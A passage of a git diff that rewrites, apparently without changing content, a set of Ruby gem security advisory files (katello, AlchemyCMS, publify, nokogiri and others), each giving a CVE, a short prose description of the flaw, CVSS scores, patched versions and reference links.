-    and extraction of the anti-CSRF token of higher privileged users. Versions before
-    3.9.0 are vulnerable.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 3.9.0"
-  related:
-    url:
-    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-16887
----
+---
+layout: advisory
+title: 'CVE-2018-16887 (katello): katello Cross-site Scripting vulnerability'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2018-16887
+  ghsa: mhhc-r88h-2qrm
+  url: https://access.redhat.com/errata/RHSA-2019:1222
+  title: katello Cross-site Scripting vulnerability
+  date: 2022-05-14
+  description: |
+    A cross-site scripting (XSS) flaw was found in the katello component
+    of Satellite. An attacker with privilege to create/edit organizations and locations
+    is able to execute a XSS attacks against other users through the Subscriptions or
+    the Red Hat Repositories wizards. This can possibly lead to malicious code execution
+    and extraction of the anti-CSRF token of higher privileged users. Versions before
+    3.9.0 are vulnerable.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 3.9.0"
+  related:
+    url:
+    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-16887
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-18307.md b/advisories/_posts/2022-05-14-CVE-2018-18307.md
index f4eb73da..0c35b0c8 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-18307.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-18307.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2018-18307 (alchemy_cms): AlchemyCMS is vulnerable to stored XSS via the
-  /admin/pictures image field'
-comments: false
-categories:
-- alchemy_cms
-advisory:
-  gem: alchemy_cms
-  cve: 2018-18307
-  ghsa: 7mj4-2984-955f
-  url: https://nvd.nist.gov/vuln/detail/CVE-2018-18307
-  title: AlchemyCMS is vulnerable to stored XSS via the /admin/pictures image field
-  date: 2022-05-14
-  description: |
-    A stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS
-    via the /admin/pictures image filename field.
-  cvss_v3: 5.9
-  unaffected_versions:
-  - "< 4.1.0"
-  patched_versions:
-  - ">= 7.4.10"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-18307
-    - http://packetstormsecurity.com/files/149787/Alchemy-CMS-4.1-Stable-Cross-Site-Scripting.html
-    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/base_controller.rb#L15
-    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/pictures_controller.rb#L5
-    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/resources_controller.rb#L21
-    - https://github.com/AlchemyCMS/alchemy_cms/pull/3375
-    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.10
-    - https://github.com/advisories/GHSA-7mj4-2984-955f
----
+---
+layout: advisory
+title: 'CVE-2018-18307 (alchemy_cms): AlchemyCMS is vulnerable to stored XSS via the
+  /admin/pictures image field'
+comments: false
+categories:
+- alchemy_cms
+advisory:
+  gem: alchemy_cms
+  cve: 2018-18307
+  ghsa: 7mj4-2984-955f
+  url: https://nvd.nist.gov/vuln/detail/CVE-2018-18307
+  title: AlchemyCMS is vulnerable to stored XSS via the /admin/pictures image field
+  date: 2022-05-14
+  description: |
+    A stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS
+    via the /admin/pictures image filename field.
+  cvss_v3: 5.9
+  unaffected_versions:
+  - "< 4.1.0"
+  patched_versions:
+  - ">= 7.4.10"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18307
+    - http://packetstormsecurity.com/files/149787/Alchemy-CMS-4.1-Stable-Cross-Site-Scripting.html
+    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/base_controller.rb#L15
+    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/pictures_controller.rb#L5
+    - https://github.com/AlchemyCMS/alchemy_cms/blob/4.1-stable/app/controllers/alchemy/admin/resources_controller.rb#L21
+    - https://github.com/AlchemyCMS/alchemy_cms/pull/3375
+    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.10
+    - https://github.com/advisories/GHSA-7mj4-2984-955f
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2012-3503.md b/advisories/_posts/2022-05-17-CVE-2012-3503.md
index 931b62d2..e04d457c 100644
--- a/advisories/_posts/2022-05-17-CVE-2012-3503.md
+++ b/advisories/_posts/2022-05-17-CVE-2012-3503.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2012-3503 (katello): Katello uses hard coded credential'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2012-3503
-  ghsa: 5xv2-q475-rwrh
-  url: https://github.com/advisories/GHSA-5xv2-q475-rwrh
-  title: Katello uses hard coded credential
-  date: 2022-05-17
-  description: |
-    The installation script in Katello 1.0 and earlier does not properly
-    generate the `Application.config.secret_token` value, which causes
-    each default installation to have the same secret token, and allows
-    remote attackers to authenticate to the CloudForms System Engine
-    web interface as an arbitrary user by creating a cookie using the
-    default `secret_token`.
-  cvss_v2: 6.5
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 1.0.6"
-  - ">= 1.1.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-3503
-    - https://github.com/Katello/katello/pull/499
-    - https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3
-    - http://rhn.redhat.com/errata/RHSA-2012-1186.html
-    - http://rhn.redhat.com/errata/RHSA-2012-1187.html
-    - https://web.archive.org/web/20140806122239/http://secunia.com/advisories/50344
-    - https://web.archive.org/web/20200229120740/http://www.securityfocus.com/bid/55140
-    - https://github.com/advisories/GHSA-5xv2-q475-rwrh
----
+---
+layout: advisory
+title: 'CVE-2012-3503 (katello): Katello uses hard coded credential'
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2012-3503
+  ghsa: 5xv2-q475-rwrh
+  url: https://github.com/advisories/GHSA-5xv2-q475-rwrh
+  title: Katello uses hard coded credential
+  date: 2022-05-17
+  description: |
+    The installation script in Katello 1.0 and earlier does not properly
+    generate the `Application.config.secret_token` value, which causes
+    each default installation to have the same secret token, and allows
+    remote attackers to authenticate to the CloudForms System Engine
+    web interface as an arbitrary user by creating a cookie using the
+    default `secret_token`.
+  cvss_v2: 6.5
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 1.0.6"
+  - ">= 1.1.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-3503
+    - https://github.com/Katello/katello/pull/499
+    - https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3
+    - http://rhn.redhat.com/errata/RHSA-2012-1186.html
+    - http://rhn.redhat.com/errata/RHSA-2012-1187.html
+    - https://web.archive.org/web/20140806122239/http://secunia.com/advisories/50344
+    - https://web.archive.org/web/20200229120740/http://www.securityfocus.com/bid/55140
+    - https://github.com/advisories/GHSA-5xv2-q475-rwrh
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2014-0084.md b/advisories/_posts/2022-05-17-CVE-2014-0084.md
index ab0b1d9e..bffdf01f 100644
--- a/advisories/_posts/2022-05-17-CVE-2014-0084.md
+++ b/advisories/_posts/2022-05-17-CVE-2014-0084.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2014-0084 (openshift-origin-node): openshift-origin-node Improper Input
-  Validation vulnerability'
-comments: false
-categories:
-- openshift-origin-node
-advisory:
-  gem: openshift-origin-node
-  cve: 2014-0084
-  ghsa: 756m-3qf2-hp58
-  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0084
-  title: openshift-origin-node Improper Input Validation vulnerability
-  date: 2022-05-17
-  description: |
-    Ruby gem openshift-origin-node before 2014-02-14 does not
-    contain a cronjob timeout which could result in a denial of
-    service in cron.daily and cron.weekly.
-  cvss_v2: 2.1
-  cvss_v3: 5.5
-  notes: Gem was never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-0084
-    - https://github.com/openshift/origin-server/pull/4764
-    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0084
-    - https://access.redhat.com/errata/RHBA-2014:0487
-    - https://access.redhat.com/security/cve/CVE-2014-0084
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1065198
-    - https://github.com/advisories/GHSA-756m-3qf2-hp58
----
+---
+layout: advisory
+title: 'CVE-2014-0084 (openshift-origin-node): openshift-origin-node Improper Input
+  Validation vulnerability'
+comments: false
+categories:
+- openshift-origin-node
+advisory:
+  gem: openshift-origin-node
+  cve: 2014-0084
+  ghsa: 756m-3qf2-hp58
+  url: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0084
+  title: openshift-origin-node Improper Input Validation vulnerability
+  date: 2022-05-17
+  description: |
+    Ruby gem openshift-origin-node before 2014-02-14 does not
+    contain a cronjob timeout which could result in a denial of
+    service in cron.daily and cron.weekly.
+  cvss_v2: 2.1
+  cvss_v3: 5.5
+  notes: Gem was never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-0084
+    - https://github.com/openshift/origin-server/pull/4764
+    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0084
+    - https://access.redhat.com/errata/RHBA-2014:0487
+    - https://access.redhat.com/security/cve/CVE-2014-0084
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1065198
+    - https://github.com/advisories/GHSA-756m-3qf2-hp58
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2017-15364.md b/advisories/_posts/2022-05-17-CVE-2017-15364.md
index 9f900ab1..90fed9d5 100644
--- a/advisories/_posts/2022-05-17-CVE-2017-15364.md
+++ b/advisories/_posts/2022-05-17-CVE-2017-15364.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2017-15364 (ccsv): ccsv Double Free vulnerability'
-comments: false
-categories:
-- ccsv
-advisory:
-  gem: ccsv
-  cve: 2017-15364
-  ghsa: 5gxp-c379-pj42
-  url: https://github.com/evan/ccsv/issues/15
-  title: ccsv Double Free vulnerability
-  date: 2022-05-17
-  description: |
-    The foreach function in `ext/ccsv.c` in Ccsv 1.1.0 allows remote attackers
-    to cause a denial of service (double free and application crash) or possibly have
-    unspecified other impact via a crafted file.
-  cvss_v3: 5.5
----
+---
+layout: advisory
+title: 'CVE-2017-15364 (ccsv): ccsv Double Free vulnerability'
+comments: false
+categories:
+- ccsv
+advisory:
+  gem: ccsv
+  cve: 2017-15364
+  ghsa: 5gxp-c379-pj42
+  url: https://github.com/evan/ccsv/issues/15
+  title: ccsv Double Free vulnerability
+  date: 2022-05-17
+  description: |
+    The foreach function in `ext/ccsv.c` in Ccsv 1.1.0 allows remote attackers
+    to cause a denial of service (double free and application crash) or possibly have
+    unspecified other impact via a crafted file.
+  cvss_v3: 5.5
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2022-0574.md b/advisories/_posts/2022-05-17-CVE-2022-0574.md
index b8b1cdf8..56113298 100644
--- a/advisories/_posts/2022-05-17-CVE-2022-0574.md
+++ b/advisories/_posts/2022-05-17-CVE-2022-0574.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-0574 (publify_core): Incorrect Authorization in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-0574
-  ghsa: 79m3-q3wh-c3qm
-  url: https://github.com/publify/publify/commit/0e6c66ac2002136517662399bca9d838c80d9739
-  title: Incorrect Authorization in publify
-  date: 2022-05-17
-  description: |
-    Improper Access Control in GitHub repository publify/publify prior to
-    9.2.8. Anonymous users can't view but can leave comments on an article in draft
-    mode.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 9.2.8"
-  related:
-    url:
-    - https://huntr.dev/bounties/6f322c84-9e20-4df6-97e8-92bc271ede3f
----
+---
+layout: advisory
+title: 'CVE-2022-0574 (publify_core): Incorrect Authorization in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-0574
+  ghsa: 79m3-q3wh-c3qm
+  url: https://github.com/publify/publify/commit/0e6c66ac2002136517662399bca9d838c80d9739
+  title: Incorrect Authorization in publify
+  date: 2022-05-17
+  description: |
+    Improper Access Control in GitHub repository publify/publify prior to
+    9.2.8. Anonymous users can't view but can leave comments on an article in draft
+    mode.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 9.2.8"
+  related:
+    url:
+    - https://huntr.dev/bounties/6f322c84-9e20-4df6-97e8-92bc271ede3f
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2022-0578.md b/advisories/_posts/2022-05-17-CVE-2022-0578.md
index 60f0bd1e..61fb81f0 100644
--- a/advisories/_posts/2022-05-17-CVE-2022-0578.md
+++ b/advisories/_posts/2022-05-17-CVE-2022-0578.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-0578 (publify_core): Code injection in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-0578
-  ghsa: w78q-4w34-jrjx
-  url: https://github.com/publify/publify/commit/b50df050c593cc532b2c516792989bcfce2d73f7
-  title: Code injection in publify
-  date: 2022-05-17
-  description: 'Code Injection in GitHub repository publify/publify prior to 9.2.8.
-
-    '
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 9.2.8"
-  related:
-    url:
-    - https://huntr.dev/bounties/02c81928-eb47-476f-8000-e93dc796dbcc
----
+---
+layout: advisory
+title: 'CVE-2022-0578 (publify_core): Code injection in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-0578
+  ghsa: w78q-4w34-jrjx
+  url: https://github.com/publify/publify/commit/b50df050c593cc532b2c516792989bcfce2d73f7
+  title: Code injection in publify
+  date: 2022-05-17
+  description: 'Code Injection in GitHub repository publify/publify prior to 9.2.8.
+
+    '
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 9.2.8"
+  related:
+    url:
+    - https://huntr.dev/bounties/02c81928-eb47-476f-8000-e93dc796dbcc
+---
diff --git a/advisories/_posts/2022-05-17-CVE-2022-1553.md b/advisories/_posts/2022-05-17-CVE-2022-1553.md
index 16789fe0..07cde406 100644
--- a/advisories/_posts/2022-05-17-CVE-2022-1553.md
+++ b/advisories/_posts/2022-05-17-CVE-2022-1553.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2022-1553 (publify_core): Article metadata exposure in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-1553
-  ghsa: 5jm7-g527-m694
-  url: https://github.com/publify/publify/commit/1a78f16f460847274265a12a9555b3524892d7db
-  title: Article metadata exposure in publify
-  date: 2022-05-17
-  description: |
-    Leaking password protected articles content due to improper access control
-    in GitHub repository publify/publify prior to 9.2.8. Attackers can leverage this
-    vulnerability to view the contents of any password-protected article present on
-    the publify website, compromising confidentiality and integrity of users.
-  cvss_v3: 4.9
-  patched_versions:
-  - ">= 9.2.8"
-  related:
-    url:
-    - https://huntr.dev/bounties/b398e4c9-6cdf-4973-ad86-da796cde221f
----
+---
+layout: advisory
+title: 'CVE-2022-1553 (publify_core): Article metadata exposure in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-1553
+  ghsa: 5jm7-g527-m694
+  url: https://github.com/publify/publify/commit/1a78f16f460847274265a12a9555b3524892d7db
+  title: Article metadata exposure in publify
+  date: 2022-05-17
+  description: |
+    Leaking password protected articles content due to improper access control
+    in GitHub repository publify/publify prior to 9.2.8. Attackers can leverage this
+    vulnerability to view the contents of any password-protected article present on
+    the publify website, compromising confidentiality and integrity of users.
+  cvss_v3: 4.9
+  patched_versions:
+  - ">= 9.2.8"
+  related:
+    url:
+    - https://huntr.dev/bounties/b398e4c9-6cdf-4973-ad86-da796cde221f
+---
diff --git a/advisories/_posts/2022-05-18-GHSA-cgx6-hpwq-fhv5.md b/advisories/_posts/2022-05-18-GHSA-cgx6-hpwq-fhv5.md
index 8b70b372..e4833e8e 100644
--- a/advisories/_posts/2022-05-18-GHSA-cgx6-hpwq-fhv5.md
+++ b/advisories/_posts/2022-05-18-GHSA-cgx6-hpwq-fhv5.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'GHSA-cgx6-hpwq-fhv5 (nokogiri): Integer Overflow or Wraparound in libxml2
-  affects Nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: cgx6-hpwq-fhv5
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-cgx6-hpwq-fhv5
-  title: Integer Overflow or Wraparound in libxml2 affects Nokogiri
-  date: 2022-05-18
-  description: |
-    ### Summary
-
-    Nokogiri v1.13.5 upgrades the packaged version of its dependency libxml2 from
-    v2.9.13 to [v2.9.14](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14).
-
-    libxml2 v2.9.14 addresses [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824).
-    This version also includes several security-related bug fixes for which CVEs were not created,
-    including a potential double-free, potential memory leaks, and integer-overflow.
-
-    Please note that this advisory only applies to the CRuby implementation of Nokogiri
-    `< 1.13.5`, and only if the _packaged_ libraries are being used. If you've overridden
-    defaults at installation time to use _system_ libraries instead of packaged libraries,
-    you should instead pay attention to your distro's `libxml2` and `libxslt` release announcements.
-
-    ### Mitigation
-
-    Upgrade to Nokogiri `>= 1.13.5`.
-
-    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation:
-    compile and link Nokogiri against external libraries libxml2 `>= 2.9.14` which will also
-    address these same issues.
-
-    ### Impact
-
-    #### libxml2 [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824)
-
-    - **CVSS3 score**:
-      - Unspecified upstream
-      - Nokogiri maintainers evaluate at 8.6 (High) ([CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H)). Note that this is different from the CVSS assessed by NVD.
-    - **Type**: Denial of service, information disclosure
-    - **Description**: In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well.
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a24
-
-    All versions of libml2 prior to v2.9.14 are affected.
-
-    Applications parsing or serializing multi-gigabyte documents (in excess of INT_MAX bytes) may be vulnerable to an integer overflow bug in buffer handling that could lead to exposure of confidential data, modification of unrelated data, or a segmentation fault resulting in a denial-of-service.
-
-
-    ### References
-
-    - [libxml2 v2.9.14 release notes](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14)
-    - [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824)
-    - [CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](https://cwe.mitre.org/data/definitions/119.html)
-  cvss_v3: 8.6
-  patched_versions:
-  - ">= 1.13.5"
-  related:
-    url:
-    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14
-    cve:
-    - 2022-29824
----
+---
+layout: advisory
+title: 'GHSA-cgx6-hpwq-fhv5 (nokogiri): Integer Overflow or Wraparound in libxml2
+  affects Nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: cgx6-hpwq-fhv5
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-cgx6-hpwq-fhv5
+  title: Integer Overflow or Wraparound in libxml2 affects Nokogiri
+  date: 2022-05-18
+  description: |
+    ### Summary
+
+    Nokogiri v1.13.5 upgrades the packaged version of its dependency libxml2 from
+    v2.9.13 to [v2.9.14](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14).
+
+    libxml2 v2.9.14 addresses [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824).
+    This version also includes several security-related bug fixes for which CVEs were not created,
+    including a potential double-free, potential memory leaks, and integer-overflow.
+
+    Please note that this advisory only applies to the CRuby implementation of Nokogiri
+    `< 1.13.5`, and only if the _packaged_ libraries are being used. If you've overridden
+    defaults at installation time to use _system_ libraries instead of packaged libraries,
+    you should instead pay attention to your distro's `libxml2` and `libxslt` release announcements.
+
+    ### Mitigation
+
+    Upgrade to Nokogiri `>= 1.13.5`.
+
+    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation:
+    compile and link Nokogiri against external libraries libxml2 `>= 2.9.14` which will also
+    address these same issues.
+
+    ### Impact
+
+    #### libxml2 [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824)
+
+    - **CVSS3 score**:
+      - Unspecified upstream
+      - Nokogiri maintainers evaluate at 8.6 (High) ([CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H)). Note that this is different from the CVSS assessed by NVD.
+    - **Type**: Denial of service, information disclosure
+    - **Description**: In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well.
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a24
+
+    All versions of libml2 prior to v2.9.14 are affected.
+
+    Applications parsing or serializing multi-gigabyte documents (in excess of INT_MAX bytes) may be vulnerable to an integer overflow bug in buffer handling that could lead to exposure of confidential data, modification of unrelated data, or a segmentation fault resulting in a denial-of-service.
+
+
+    ### References
+
+    - [libxml2 v2.9.14 release notes](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14)
+    - [CVE-2022-29824](https://nvd.nist.gov/vuln/detail/CVE-2022-29824)
+    - [CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](https://cwe.mitre.org/data/definitions/119.html)
+  cvss_v3: 8.6
+  patched_versions:
+  - ">= 1.13.5"
+  related:
+    url:
+    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.9.14
+    cve:
+    - 2022-29824
+---
diff --git a/advisories/_posts/2022-05-19-CVE-2019-25061.md b/advisories/_posts/2022-05-19-CVE-2019-25061.md
index 4d435aea..1195e0d4 100644
--- a/advisories/_posts/2022-05-19-CVE-2019-25061.md
+++ b/advisories/_posts/2022-05-19-CVE-2019-25061.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2019-25061 (random_password_generator): Insecure PRNG use in random_password_generator'
-comments: false
-categories:
-- random_password_generator
-advisory:
-  gem: random_password_generator
-  cve: 2019-25061
-  ghsa: ggfx-h9xj-5v9c
-  url: https://github.com/bvsatyaram/random_password_generator/pull/1
-  title: Insecure PRNG use in random_password_generator
-  date: 2022-05-19
-  description: |
-    The random_password_generator (aka RandomPasswordGenerator) gem through
-    1.0.0 for Ruby uses Kernel#rand to generate passwords, which, due to its cyclic
-    nature, can facilitate password prediction.
-  cvss_v3: 7.5
-  related:
-    url:
-    - https://github.com/bvsatyaram/random_password_generator/blob/2855e8d7d8803dbb580ddd6cf13846394eb4530e/lib/random_password_generator.rb#L23
-    - https://ruby-doc.org/core-3.1.2/Random.html
-    - https://stackoverflow.com/questions/42170239/security-of-rand-in-ruby-compared-to-other-methods/42170560
----
+---
+layout: advisory
+title: 'CVE-2019-25061 (random_password_generator): Insecure PRNG use in random_password_generator'
+comments: false
+categories:
+- random_password_generator
+advisory:
+  gem: random_password_generator
+  cve: 2019-25061
+  ghsa: ggfx-h9xj-5v9c
+  url: https://github.com/bvsatyaram/random_password_generator/pull/1
+  title: Insecure PRNG use in random_password_generator
+  date: 2022-05-19
+  description: |
+    The random_password_generator (aka RandomPasswordGenerator) gem through
+    1.0.0 for Ruby uses Kernel#rand to generate passwords, which, due to its cyclic
+    nature, can facilitate password prediction.
+  cvss_v3: 7.5
+  related:
+    url:
+    - https://github.com/bvsatyaram/random_password_generator/blob/2855e8d7d8803dbb580ddd6cf13846394eb4530e/lib/random_password_generator.rb#L23
+    - https://ruby-doc.org/core-3.1.2/Random.html
+    - https://stackoverflow.com/questions/42170239/security-of-rand-in-ruby-compared-to-other-methods/42170560
+---
diff --git a/advisories/_posts/2022-05-23-CVE-2022-29181.md b/advisories/_posts/2022-05-23-CVE-2022-29181.md
index a5040470..df4b45ea 100644
--- a/advisories/_posts/2022-05-23-CVE-2022-29181.md
+++ b/advisories/_posts/2022-05-23-CVE-2022-29181.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2022-29181 (nokogiri): Improper Handling of Unexpected Data Type in Nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2022-29181
-  ghsa: xh29-r2w5-wx8m
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m
-  title: Improper Handling of Unexpected Data Type in Nokogiri
-  date: 2022-05-23
-  description: |
-    ### Summary
-
-    Nokogiri `< v1.13.6` does not type-check all inputs into the XML and HTML4 SAX parsers.
-    For CRuby users, this may allow specially crafted untrusted inputs to cause illegal
-    memory access errors (segfault) or reads from unrelated memory.
-
-    ### Severity
-
-    The Nokogiri maintainers have evaluated this as **High 8.2** (CVSS3.1).
-
-    ### Mitigation
-
-    CRuby users should upgrade to Nokogiri `>= 1.13.6`.
-
-    JRuby users are not affected.
-
-    ### Workarounds
-
-    To avoid this vulnerability in affected applications, ensure the untrusted input is a
-    `String` by calling `#to_s` or equivalent.
-  cvss_v3: 8.2
-  patched_versions:
-  - ">= 1.13.6"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/commit/db05ba9a1bd4b90aa6c76742cf6102a7c7297267
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.6
-    - https://securitylab.github.com/advisories/GHSL-2022-031_GHSL-2022-032_Nokogiri/
----
+---
+layout: advisory
+title: 'CVE-2022-29181 (nokogiri): Improper Handling of Unexpected Data Type in Nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2022-29181
+  ghsa: xh29-r2w5-wx8m
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m
+  title: Improper Handling of Unexpected Data Type in Nokogiri
+  date: 2022-05-23
+  description: |
+    ### Summary
+
+    Nokogiri `< v1.13.6` does not type-check all inputs into the XML and HTML4 SAX parsers.
+    For CRuby users, this may allow specially crafted untrusted inputs to cause illegal
+    memory access errors (segfault) or reads from unrelated memory.
+
+    ### Severity
+
+    The Nokogiri maintainers have evaluated this as **High 8.2** (CVSS3.1).
+
+    ### Mitigation
+
+    CRuby users should upgrade to Nokogiri `>= 1.13.6`.
+
+    JRuby users are not affected.
+
+    ### Workarounds
+
+    To avoid this vulnerability in affected applications, ensure the untrusted input is a
+    `String` by calling `#to_s` or equivalent.
+  cvss_v3: 8.2
+  patched_versions:
+  - ">= 1.13.6"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/commit/db05ba9a1bd4b90aa6c76742cf6102a7c7297267
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.6
+    - https://securitylab.github.com/advisories/GHSL-2022-031_GHSL-2022-032_Nokogiri/
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2015-2784.md b/advisories/_posts/2022-05-24-CVE-2015-2784.md
index 5ec49622..2559d661 100644
--- a/advisories/_posts/2022-05-24-CVE-2015-2784.md
+++ b/advisories/_posts/2022-05-24-CVE-2015-2784.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2015-2784 (papercrop): papercrop does not properly handle crop input'
-comments: false
-categories:
-- papercrop
-advisory:
-  gem: papercrop
-  cve: 2015-2784
-  ghsa: m44r-gv6q-9j9r
-  url: https://github.com/rsantamaria/papercrop/commit/b4ecd95debaf0a8712bd1d34def83f41fc6b3579
-  title: papercrop does not properly handle crop input
-  date: 2022-05-24
-  description: |
-    The papercrop gem before 0.3.0 for Ruby on Rails does not properly handle
-    crop input.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
+title: 'CVE-2015-2784 (papercrop): papercrop does not properly handle crop input'
+comments: false
+categories:
+- papercrop
+advisory:
+  gem: papercrop
+  cve: 2015-2784
+  ghsa: m44r-gv6q-9j9r
+  url: https://github.com/rsantamaria/papercrop/commit/b4ecd95debaf0a8712bd1d34def83f41fc6b3579
+  title: papercrop does not properly handle crop input
+  date: 2022-05-24
+  description: |
+    The papercrop gem before 0.3.0 for Ruby on Rails does not properly handle
+    crop input.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2019-10226.md b/advisories/_posts/2022-05-24-CVE-2019-10226.md
index fe50102c..daa21947 100644
--- a/advisories/_posts/2022-05-24-CVE-2019-10226.md
+++ b/advisories/_posts/2022-05-24-CVE-2019-10226.md
@@ -1,18 +1,18 @@
----
-layout: advisory
-title: 'CVE-2019-10226 (fat_free_crm): Fat Free CRM Cross-site Scripting vulnerability'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2019-10226
